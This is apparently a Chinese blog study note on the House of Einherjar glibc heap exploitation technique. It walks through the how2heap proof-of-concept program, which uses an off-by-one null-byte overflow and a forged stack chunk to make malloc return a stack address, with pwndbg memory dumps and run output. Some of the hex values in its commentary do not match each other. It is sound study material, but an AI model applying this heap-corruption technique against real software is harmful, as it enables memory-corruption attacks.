house_of_einherjar

First Post:

Last Update:

来玩把祖玛吧
利用的是free的后向合并

free函数后向合并关键代码

1
2
3
4
5
6
7
/*consolidate backward*/
if (!prev_inuse(p)){//判断被释放堆块p的inuse标志位是否为0,如果为0则进行if中的内容,相当于一个检查。通过这个点说明我们至少要通过堆溢出去覆盖掉相邻高地址位的inuse标志位,最常见的方式就是off-by-one
prevsize p->prev size;//记录相邻堆块p的prev_size值
size += prev_size;//size为size + prev_size
p = chunk_at_offset(p,-((long)prevsize));//堆块p的指针最后由chunk_at_offset()函数决定,chunk_at_offset()函数如下图,作用是将原本p指针位置加上s偏移后的位置作为合并堆块的新指针。那么带回到free函数中,意思就是原本p指针需要减去(向后)一个后向堆块size(p->prev_size)大小的偏移后得到合并堆块的新指针
unlink(av, p, bck, fwd);//unlink检查
}

debug程序来自how2heap
还是放个原程序在这吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
//gcc house_of_einherjar.c -g -o einherjar
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
#include <assert.h>

/*
Credit to st4g3r for publishing this technique
The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

int main()
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);

printf("Welcome to House of Einherjar!\n");
printf("Tested in Ubuntu 18.04.4 64bit.\n");
printf("This technique only works with disabled tcache-option for glibc or with size of b larger than 0x408, see build_glibc.sh for build instructions.\n");
printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* d;

printf("\nWe allocate 0x38 bytes for 'a'\n");
a = (uint8_t*) malloc(0x38);
printf("a: %p\n", a);

int real_a_size = malloc_usable_size(a);
printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk
printf("\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
printf("However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
printf("(although we could do the unsafe unlink technique here in some scenarios)\n");

size_t fake_chunk[6];

fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
fake_chunk[2] = (size_t) fake_chunk; // fwd
fake_chunk[3] = (size_t) fake_chunk; // bck
fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


printf("Our fake chunk at %p looks like:\n", fake_chunk);
printf("prev_size (not used): %#lx\n", fake_chunk[0]);
printf("size: %#lx\n", fake_chunk[1]);
printf("fwd: %#lx\n", fake_chunk[2]);
printf("bck: %#lx\n", fake_chunk[3]);
printf("fwd_nextsize: %#lx\n", fake_chunk[4]);
printf("bck_nextsize: %#lx\n", fake_chunk[5]);

/* In this case it is easier if the chunk size attribute has a least significant byte with
* a value of 0x00. The least significant byte of this will be 0x00, because the size of
* the chunk includes the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0x4f8);
int real_b_size = malloc_usable_size(b);

printf("\nWe allocate 0x4f8 bytes for 'b'.\n");
printf("b: %p\n", b);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);
/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

printf("\nb.size: %#lx\n", *b_size_ptr);
printf("b.size is: (0x500) | prev_inuse = 0x501\n");
printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
/* VULNERABILITY */
a[real_a_size] = 0;
/* VULNERABILITY */
printf("b.size: %#lx\n", *b_size_ptr);
printf("This is easiest if b.size is a multiple of 0x100 so you "
"don't change the size of b, only its prev_inuse bit\n");
printf("If it had been modified, we would need a fake chunk inside "
"b where it will try to consolidate the next chunk\n");

// Write a fake prev_size to the end of a
printf("\nWe write a fake prev_size to the last %lu bytes of a so that "
"it will consolidate with our fake chunk\n", sizeof(size_t));
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

//Change the fake chunk's size to reflect b's new prev_size
printf("\nModify fake chunk's size to reflect b's new prev_size\n");
fake_chunk[1] = fake_size;

// free b and it will consolidate with our fake chunk
printf("Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
free(b);
printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

//if we allocate another chunk before we free b we will need to
//do two things:
//1) We will need to adjust the size of our fake chunk so that
//fake_chunk + fake_chunk's size points to an area we control
//2) we will need to write the size of our fake chunk
//at the location we control.
//After doing these two things, when unlink gets called, our fake chunk will
//pass the size(P) == prev_size(next_chunk(P)) test.
//otherwise we need to make sure that our fake chunk is up against the
//wilderness
//

printf("\nNow we can call malloc() and it will begin in our fake chunk\n");
d = malloc(0x200);
printf("Next malloc(0x200) is at %p\n", d);

assert((long)d == (long)&fake_chunk[2]);
}

我去除了大部分的英文
但保留了漏洞利用
这样才知道打的是house_of_einherjar(doge)
其实是方便调试
如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
//gcc house_of_einherjar.c -g -o einherjar
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
#include <assert.h>


int main()
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);


uint8_t* a;
uint8_t* b;
uint8_t* d;
//create 0x48(0x38+0x10)size chunka
a = (uint8_t*) malloc(0x38);
printf("a: %p\n", a);

int real_a_size = malloc_usable_size(a);
printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk

size_t fake_chunk[6];
fake_chunk[0] = 0x100;
fake_chunk[1] = 0x100;
fake_chunk[2] = (size_t) fake_chunk;
fake_chunk[3] = (size_t) fake_chunk;
fake_chunk[4] = (size_t) fake_chunk;
fake_chunk[5] = (size_t) fake_chunk;

//create 0x508(0x4f8+0x10) chunkb
b = (uint8_t*) malloc(0x4f8);
int real_b_size = malloc_usable_size(b);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);
printf("\nb.size: %#lx\n", *b_size_ptr);
a[real_a_size] = 0;
printf("b.size: %#lx\n", *b_size_ptr);

size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

fake_chunk[1] = fake_size;

free(b);
printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);


d = malloc(0x200);
printf("Next malloc(0x200) is at %p\n", d);

assert((long)d == (long)&fake_chunk[2]);
}

from GPT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
变量声明:程序声明了三个指向 uint8_t 类型的指针变量 a, b, d,用于存储内存地址。

a = (uint8_t*) malloc(0x38);:通过 malloc 函数分配了 0x38 字节大小的内存,并将其起始地址赋给变量 a。

输出地址:使用 printf 语句打印变量 a 的地址。

int real_a_size = malloc_usable_size(a);:使用 malloc_usable_size 函数获取由 malloc 分配的实际可使用的内存大小,并将结果保存在变量 real_a_size 中。

打印实际大小:打印变量 real_a_size 的值。

声明数组变量:声明了一个名为 fake_chunk 的大小为 6 的 size_t 类型的数组。

初始化数组:给数组元素赋值。这个数组用于构造一个假的堆块结构。

输出数组内容:使用 printf 打印数组 fake_chunk 中的内容。

b = (uint8_t*) malloc(0x4f8);:通过 malloc 函数分配了 0x4f8 字节大小的内存,并将其起始地址赋给变量 b。

获取实际大小:使用 malloc_usable_size 函数获取由 malloc 分配的实际可使用的内存大小,并将结果保存在变量 real_b_size 中。

输出地址:打印变量 b 的地址。

uint64_t* b_size_ptr = (uint64_t*)(b - 8);:声明一个指向 uint64_t 类型的指针变量 b_size_ptr,并将其指向变量 b 前面 8 个字节。

输出 b.size:打印变量 b_size_ptr 的值,即变量 b 前面 8 个字节中保存的数值。

内存溢出:通过写入 a[real_a_size] = 0;,在变量 a 的末尾写入一个字节的数据,可能导致溢出。

输出 b.size:再次打印变量 b_size_ptr 的值,查看是否受到内存溢出的影响。

计算假的 prev_size:通过计算两个内存地址之间的偏移量来计算假的 prev_size 值。

写入假的 prev_size:将计算得到的假的 prev_size 值写入 a 的末尾,以模拟一个被溢出修改的堆块。

更新 fake_chunk[1]:更新数组 fake_chunk 的第二个元素,使其与假的 prev_size 值保持一致。

释放 b:使用 free 函数释放变量 b 所指向的内存块。

输出 fake chunk 大小:打印更新后的假的堆块大小。

d = malloc(0x200);:通过 malloc 函数分配了 0x200 字节大小的内存,并将其起始地址赋给变量 d。

输出下一个分配的地址:打印变量 d 的地址。

使用 assert 函数进行断言判断:判断变量 d 是否等于 &fake_chunk[2]。

程序先创建了以下两个堆块和中间一个“堆块”
chunka

1
2
3
4
5
pwndbg> x/8gx 0x555555757250
0x555555757250: 0x0000000000000000 0x0000000000000041
0x555555757260: 0x0000000000000000 0x0000000000000000
0x555555757270: 0x0000000000000000 0x0000000000000000
0x555555757280: 0x0000000000000000 0x0000000000000000

fake_chunk

1
2
3
4
5
6
pwndbg> x/10gx 0x7fffffffe2c0
0x7fffffffe2c0: 0x0000000000000100 0x0000000000000100
0x7fffffffe2d0: 0x00007fffffffe2c0 0x00007fffffffe2c0
0x7fffffffe2e0: 0x00007fffffffe2c0 0x00007fffffffe2c0
0x7fffffffe2f0: 0x00007fffffffe3e0 0x574290d927ca7a00
0x7fffffffe300: 0x0000555555554ae0 0x00007ffff7a03c87

chunkb

1
2
3
4
5
6
pwndbg> x/10gx 0x555555757290
0x555555757290: 0x0000000000000000 0x0000000000000501
0x5555557572a0: 0x0000000000000000 0x0000000000000000
0x5555557572b0: 0x0000000000000000 0x0000000000000000
0x5555557572c0: 0x0000000000000000 0x0000000000000000
0x5555557572d0: 0x0000000000000000 0x0000000000000000

执行

1
uint64_t* b_size_ptr = (uint64_t*)(b - 8);

这里其实就是将chunk_b的malloc指针-0x8的位置,即chunk_b的size值放在了b_size_ptr变量中。

1
2
3
4
pwndbg> p b_size_ptr
$1 = (uint64_t *) 0x555555757298
pwndbg> x/2gx 0x555555757298
0x555555757298: 0x0000000000000501 0x0000000000000000

再执行

1
a[real_a_size] = 0;

这里模拟的就是off-by-one的过程。那么这样一来chunk_b的inuse标志位就被覆盖成了0

看一下两个chunk
注意chunkb的变化

1
2
3
4
5
6
7
8
9
10
11
12
pwndbg> x/20gx 0x555555757250
0x555555757250: 0x0000000000000000 0x0000000000000041
0x555555757260: 0x0000000000000000 0x0000000000000000
0x555555757270: 0x0000000000000000 0x0000000000000000
0x555555757280: 0x0000000000000000 0x0000000000000000
0x555555757290: 0x0000000000000000 0x0000000000000500**
0x5555557572a0: 0x0000000000000000 0x0000000000000000
0x5555557572b0: 0x0000000000000000 0x0000000000000000
0x5555557572c0: 0x0000000000000000 0x0000000000000000
0x5555557572d0: 0x0000000000000000 0x0000000000000000
0x5555557572e0: 0x0000000000000000 0x0000000000000000

执行到

1
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
1
2
pwndbg> p/x fake_size
$2 = 0xffffd55555758fd0

fake_size是由b-sizeof(size_t)2和(uint8_t)fake_chunk相减得到的:

b-sizeof(size_t)2:chunk_b的malloc指针减去两个地址位宽,也就是chunk_b的头指针
(uint8_t
)fake_chunk:即是伪造堆块的头指针
那么这样一来就可以很明显的看出fake_size,即是chunk_b头指针距离fake_chunk头指针的偏移,需要注意的是我们看到的偏移为0xffffd55555758fd0
这代表着偏移其实是一个负数

执行

1
2
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;
fake_chunk[1] = fake_size;

看chunkb和fakechunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
pwndbg> x/10gx 0x555555757290 //chunkb
0x555555757290: 0xffffd55555758fd0 0x0000000000000500
0x5555557572a0: 0x0000000000000000 0x0000000000000000
0x5555557572b0: 0x0000000000000000 0x0000000000000000
0x5555557572c0: 0x0000000000000000 0x0000000000000000
0x5555557572d0: 0x0000000000000000 0x0000000000000000

pwndbg> x/10gx 0x7fffffffe2c0 //fakechunk
0x7fffffffe2c0: 0x0000000000000100 0xffffd55555758fd0
0x7fffffffe2d0: 0x00007fffffffe2c0 0x00007fffffffe2c0
0x7fffffffe2e0: 0x00007fffffffe2c0 0x00007fffffffe2c0
0x7fffffffe2f0: 0x00007fffffffe3e0 0x574290d927ca7a00
0x7fffffffe300: 0x0000555555554ae0 0x00007ffff7a03c87

chunk_b的prev_size等于fake_chunk的size,这个size恰巧又是chunk_b到fake_chunk的偏移,更巧的是chunk_b的inuse标志位为0

那么如果我们free(b),os首先会去检查其inuse标志位,发现为0,这就意味着存在一个相邻地址的堆块也是处于释放状态的
那么就会根据chunk_b的prev_size先前找是否存在一个大小为0xffffd55555779d41大小的堆块
结果根据chunk_b的头指针+0xffffd55555779d41处找到了fake_chunk
fake_chunk的size正是我们设置的0xffffd55555779d41
根据free函数后向合并机制,由于我们伪造了fake_chunk的fd、bk、fd_nextsize、bk_nextsize,所以可以绕过unlink检查
那么chunkb与fakechunk就被合并称为一个大小为fake_size + b_size的大堆块
并且合并大堆块的头指针即是fake_chunk的头指针0x7fffffffe2d0

且,根据top_chunk合并机制,由于chunk_b是紧邻top_chunk的,那么在chunk_b与fake_chunk合并之后top_chunk会收下合并后的整个大堆块
新的top_chunk的size变成了old_topchunk_size + fake_chunk_size + chunkb_size。并且top_chunk的头指针会变成合并堆块的头指针,即fake_chunk的头指针0xffffd55555779d41

接下来我们执行free(b)和malloc(0x200)这两步操作
free(b)会完成上述的执行过程
而因为bin中没有能够满足malloc(0x200)的空闲块,所以会向top_chunk申请一个size为0x200大小的堆块
由于此时top_chunk的头指针是fake_chunk(0x7fffffffe2d0)
所以最后被启用的堆块即是以fake_chunk为头指针0x7fffffffe2d0,size为0x210大小的堆块

这样我们伪造的fakechunk就会被以正常堆块的形式被malloc出来了

1
2
3
4
5
pwndbg> c
Continuing.
Our fake chunk size is now 0xffffd55555779d41 (b.size + fake_prev_size)
Next malloc(0x200) is at 0x7fffffffe2d0
[Inferior 1 (process 4452) exited normally]

像小时候玩的祖玛

放个完整的运行信息
程序为how2heap源程序house_of_einherjar

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
root@ubuntu:/home/str1k3/Desktop# ./a.out
Welcome to House of Einherjar!
Tested in Ubuntu 18.04.4 64bit.
This technique only works with disabled tcache-option for glibc or with size of b larger than 0x408, see build_glibc.sh for build instructions.
This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.

We allocate 0x38 bytes for 'a'
a: 0x5625ee49e260
Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: 0x38

We create a fake chunk wherever we want, in this case we'll create the chunk on the stack
However, you can also create the chunk in the heap or the bss, as long as you know its address
We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks
(although we could do the unsafe unlink technique here in some scenarios)
Our fake chunk at 0x7ffe1bda3090 looks like:
prev_size (not used): 0x100
size: 0x100
fwd: 0x7ffe1bda3090
bck: 0x7ffe1bda3090
fwd_nextsize: 0x7ffe1bda3090
bck_nextsize: 0x7ffe1bda3090

We allocate 0x4f8 bytes for 'b'.
b: 0x5625ee49e2a0

b.size: 0x501
b.size is: (0x500) | prev_inuse = 0x501
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x500
This is easiest if b.size is a multiple of 0x100 so you don't change the size of b, only its prev_inuse bit
If it had been modified, we would need a fake chunk inside b where it will try to consolidate the next chunk

We write a fake prev_size to the last 8 bytes of a so that it will consolidate with our fake chunk
Our fake prev_size will be 0x5625ee49e290 - 0x7ffe1bda3090 = 0xffffd627d26fb200

Modify fake chunk's size to reflect b's new prev_size
Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set
Our fake chunk size is now 0xffffd627d271bf71 (b.size + fake_prev_size)

Now we can call malloc() and it will begin in our fake chunk
Next malloc(0x200) is at 0x7ffe1bda30a0

来自hollk师傅的总结
利用该方法需要注意的三点

1.需要有溢出漏洞可以写物理相邻的高地址的 prev_size 与 PREV_INUSE 部分
2.需要计算目的 fake_chunk 与 chunk_b 地址之间的差,所以需要泄漏地址
3.需要在目的 chunk 附近构造相应的 fake chunk,从而绕过 unlink 的检测

前面的例题,以后再来探索吧